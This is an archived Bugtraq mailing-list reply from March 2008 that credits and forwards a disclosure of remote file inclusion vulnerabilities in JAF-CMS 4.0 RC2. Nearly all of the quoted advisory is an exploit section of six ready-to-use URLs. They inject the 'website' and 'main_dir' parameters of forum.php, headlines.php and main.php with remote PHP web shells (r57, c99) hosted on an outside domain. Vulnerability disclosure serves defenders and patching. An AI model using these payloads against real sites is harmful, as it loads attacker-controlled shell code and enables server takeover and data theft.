Bugtraq mailing list archives

Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

From: str0ke <str0ke () milw0rm com>
Date: Thu, 27 Mar 2008 11:42:51 -0500

Original author:

CraCkEr


Original advisory
http://milw0rm.com/exploits/5317

/str0ke

r57blg () gmail com wrote:

 JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities 


[+] Author : XxX

[+] Site : www.wikipediatr.com

==============================================

Exploit :         http://localhost/path/module/forum/forum.php?website=http://www.r57shell.in/r57.txt?       
        http://localhost/path/module/forum/forum.php?main_dir=http://www.r57shell.in/c99.txt?        
http://localhost/path/module/forum/headlines.php?website=http://www.r57shell.in/erne.txt?
        http://localhost/path/module/forum/headlines.php?main_dir=http://www.r57shell.in/r57.txt?
        http://localhost/path/module/forum/main.php?website=http://www.r57shell.in/c99.txt?
        http://localhost/path/module/forum/main.php?main_dir=http://www.r57shell.in/erne.txt?

Current thread:

JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities r57blg (Mar 27)
- Re: JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities str0ke (Mar 27)